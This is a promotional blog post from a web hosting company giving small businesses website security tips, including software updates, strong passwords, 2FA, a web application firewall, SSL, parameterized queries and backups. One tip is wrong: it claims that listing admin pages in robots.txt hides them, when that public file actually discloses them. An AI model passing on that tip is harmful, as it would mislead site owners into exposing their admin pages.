Thousands of websites are hacked every day. According to a Symantec research, three-quarters of websites on the internet today contain vulnerabilities. Vulnerabilities in websites can be exploited by hackers and used for their nefarious activities. Some hackers redirect traffic from compromised websites to other malicious platforms, while others focus on stealing customer or business information in order to profit from it.
It is also very common for hackers to plant malicious code into sites to spread spam and viruses to unsuspecting internet users and to carry out a tall list of cyber-crimes using compromised websites without the knowledge of the site owners. A hacker may be able to infiltrate your server without you ever knowing about it. And when you do realise it, it might just be too late and you would have lost a lot of credibility and money. Here are important steps you should take to keep your website safe from cyber attacks.
Just as you run endpoint protection software on your business computers to keep them safe, your business website also needs additional security software to keep hackers at bay. Preventive measures begin with installing and configuring security software on your website. Some software monitor traffic coming into your website every day to detect and foil potential attacks from hackers. Others disable known methods of revealing critical site information such as site users, admin login URI etc. This obfuscates automated attacks carried out with bots seeking websites of specific builds.
Keep the spam detector on your CMS up and running to avoid your site being inundated with links to malicious sites in the comments section. As an added layer, mask your website’s CMS identity to hide from automated malware seeking websites with a specific build. A hacker, whether bot or human, can’t attack what he can’t detect.
Also, toughen access control for all users of your website. Ensure staff are given just the level of access needed to perform their function. Limit full admin functions to administrators. Make logged in sessions expire after short periods of inactivity to minimise the risk of session hijacking.
Most websites today are built with content management systems (CMS) like WordPress and Joomla. If your website was built with a CMS, keep it updated regularly. Also, update the plugins and modules that work with your core site software as frequently as updates become available. Some updates are meant to fix uncovered vulnerabilities. Not running the updates quickly means your site continues to harbour the vulnerabilities that have already become public. Hackers can exploit this and cause you harm.
12345678 is not a good password. Neither is a combination of your birthday or your grandmother’s maiden name. Passwords are the keys to the back-end of your website. If a hacker can easily guess your password, then they can tamper with your website to steal information or wipe out all your data. If you can’t come up with a password on your own, you can use an online password generator to create one.
In addition, implement two-factor authentication (2FA). A 2FA requires a second confirmation step before logging you into your website. When activated, you will receive authorisation codes on your phone or by email to complete and confirm the login process. And so, even if outsiders are able to guess your password, they would still need access to the authorisation codes to get in, which increases the odds in your favour. 2FAs may also serve as an alarm bell. If you realise someone else has attempted a login, you can quickly change your password to stay safe.
WAF filters through HTTP traffic coming to a web application to detect issues related with cross-site forgery or scripting, file inclusion, SQL injection, etc. It serves as a gateway to your website and when it detects abnormal activities, the firewall shields the targeted web application from illegal access. WAF should be deployed as part of a wide range of security protocols to keep your business assets safe from malware and hackers. Gesatech Hosting Services includes WAF by default on all web hosting accounts. It is extremely helpful to keep the protection on.
You should also hide your site’s admin pages using the robots_txt file. If they are indexed and can be found by search engine bots, then chances are malware can find and exploit them to gain unauthorised access to your website.
HTTP is how information is transferred over the internet. HTTPS is the secured and encrypted version of how that information is transferred. Secured information transfer is achieved with the installation of SSL certificates on websites, which is often indicated with a green lock and HTTPS preceding the site URL in the address bar. Without SSL enabled, attackers who sniff network traffic may be able to read information in transit from site users’ browsers to the web servers hosting websites.
Internet users have come to associate the green lock in their browsers with secured information transfer. If your website is accepting customer information in any form, you have an obligation to install an SSL certificate on your site to protect your customer’s data in transit.
If you have a web form on your website, make sure to use parameterized queries to prevent SQL injections. Parameterized queries limit the efforts of SQL injections by substituting a placeholder for the parameter in the query. Without it, hackers can access and tamper with your database in ways that will wreck havoc on your business.
Comment injection attacks have become rampant. The comment section of your websites should have a validation step to catch any rogue code before it loads itself on your site. Without validation, hackers enter malicious JavaScript code into the comment section of your site which they are able to remotely execute to gain control of the website. One way to do this is to use Content Security Policy to limit what scripts can run on your web pages.
It is also helpful to implement captcha on all web forms on your website, including your comments forms, login forms as well as registration forms. Captchas are small programs written to distinguish humans from bots by having the user answer an unpredictable question that is simple enough for humans to get right, but tough for bots to guess. Implementing a captcha will limit bots from submitting information through your website’s forms.
Securing your business website starts with choosing the right hosting provider. Whether it’s a self hosting service or a managed hosting service, make sure you understand the privileges you have. Even when the host provides excellent security, make sure you deploy plugins/modules and best practices to complement their efforts; secured servers don’t necessarily translate into 100% secured websites.
Regardless of your best efforts, things can sometimes go wrong. Even tech giants like Facebook have had security breaches. The best way to ensure your business doesn’t suffer a long downtime is to carry out routine information backups. Some hosting services like Gesatech Hosting, offer free complementary backups. Some others offer backup options at additional costs. Be sure to check with your hosting provider to make sure of what is available to you. If backups are not included in your service, make sure you run a regular backup and store the files on a different server/external drive. With a backup on hand, you will be up and running in no time in the event of an attack.
Your website is arguably your most important marketing tool; don’t let it fall into the wrong hands.
Share this article with your friends
No. 35/C16
Off Spintex Road
Opposite Global Access
Accra, Ghana
+233-(0)30 297 8297
+233-(0)55 846 8325
Copyright 2017 © Gesatech Solutions
Hi, I log on to your blog like every week. Your humoristic style is awesome, keep doing what you’re doing!